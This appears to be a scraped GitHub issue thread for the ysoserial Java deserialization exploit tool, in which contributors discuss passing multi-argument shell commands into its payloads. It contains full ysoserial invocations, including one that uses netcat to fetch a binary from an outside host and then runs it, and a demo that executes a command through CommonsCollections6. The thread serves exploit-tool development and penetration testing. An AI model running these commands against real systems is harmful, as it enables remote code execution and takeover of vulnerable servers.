Comments (6)
May I make a suggestion for a temporary solution to #72 that incorporates #60 and #74 ?
Convert Runtime.exec(String) to Runtime.exec(String[]) with the intention of creating a payload containing platform-specific commands like the following:
- cmd /c "ping ..."
- bash -c "ping ..."
The argument within the parenthesis (ping ...) will be passed into ysoserial using the second command line argument (as usual). All arguments before this will be read from a Java System Property (which can be passed on the command line as such: -Dargname=argval). The value of the property will be read in by the payload class and split into a String array by whitespace. An example execution of ysoserial would be as such:
- java -Dysoserial.prefix="bash -c" -jar ysoserial.jar CommonsCollections1 "ping -c 4 127.0.0.1"
If the expected System Property is not present during payload creation, the inputted command should instead be split into a String array by whitespace to ensure that the payload will still be generated and which will execute on the target system almost identically as a payload containing Runtime.exec(String).
I have included implementations of the above proposed fix in the attached zip file, specifically for CommonsCollections1, CommonsCollections5 and CommonsCollections6 (all in new classes with the names [CLASSNAME]Chained.java). These classes expect a System Property "ysoserial.prefix" to be set on the command line.
from ysoserial.
I needed to run the following "/bin/sh -c 'nc 172.28.128.1 4444 > /tmp/payload; chmod +x /tmp/payload; /tmp/payload'" and tried both your changes.
@frohoff the multiarg branch didn't work... also I suggest you don't hardcode bash, some targets might only have sh
@Bort-Millipede your edited classes worked. I know they are a bit hackish but you saved me a lot of time, thanks!
from ysoserial.
This should already be supported by the in-development multiargs
branch being developed for #74 without any special parameters by just including the script interpreter "prelude" in the payload command: bash -c '[my bash command]'
or cmd /c "my cmd command"
.
$ echo $$
2
$ java -jar target/ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections6 \
> bash -c 'echo executed in pid $$ > pwned' \
> | java -cp target/ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.Deserializer
$ cat pwned
executed in pid 630
Is there a reason this wouldn't work reasonably well for the scenario you describe?
from ysoserial.
Your solution would work perfectly well for the scenario I described (and potentially better than the code I posted). I wasn't sure if that multiarg support was still being planned or if it was already being implemented. I just posted my proposed temporary solution in case multiarg support was still on the drawing board. I will check out the multiarg branch, thanks for letting me know about it!
from ysoserial.
The multiarg branch currently requires multiarg commands be passed without the outermost enclosing quotes so it comes through as multiple arguments in Java's main(String[])
, so you'd want to specify the above as:
java -jar ysoserial.jar CommonsCollections6 /bin/sh -c 'nc 172.28.128.1 4444 > /tmp/payload; chmod +x /tmp/payload; /tmp/payload'
This current behavior errs on the side of allowing executables with spaces in the path over preserving backwards compatibility, though this might change in the future.
I'm not aware of bash
being hard-coded anywhere.
from ysoserial.
from ysoserial.
Related Issues (20)
- Troubleshooting docs
- i can't found ysoserial.jar ! HOT 2
- ysoserial doesn't work with Java 18 HOT 1
- another way to Get PoC with RCE HOT 1
- Help understanding the CommonsBeanutils1 payload HOT 1
- Error while generating or serializing payload(openjdk17) HOT 1
- Ysoserial doesn't work with Java version 17 HOT 11
- Error: Unable to access jarfile ysoserial.jar HOT 6
- Error while generating or serializing payload (FIXED) HOT 2
- A tool for fuzzing the right payload HOT 3
- I don't know how to input next. HOT 2
- How can I create the sleep payload in the following payload with ysoserial? HOT 1
- Common Collection1 failed HOT 1
- Hello, I have some confusion about the code implementation of URLDNS HOT 2
- getting error while executing the command HOT 1
- ERROR when building → javax.interceptor depency no longer available at repo.jenkins-ci.org
- Ysoserial - System.IO.FileNotFoundException HOT 1
- parameter 'descriptor' has been removed from the plugin, please verify documentation.
- javax.interceptor-api/3.1 is no longer available HOT 1
- Build Failure HOT 1
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.
from ysoserial.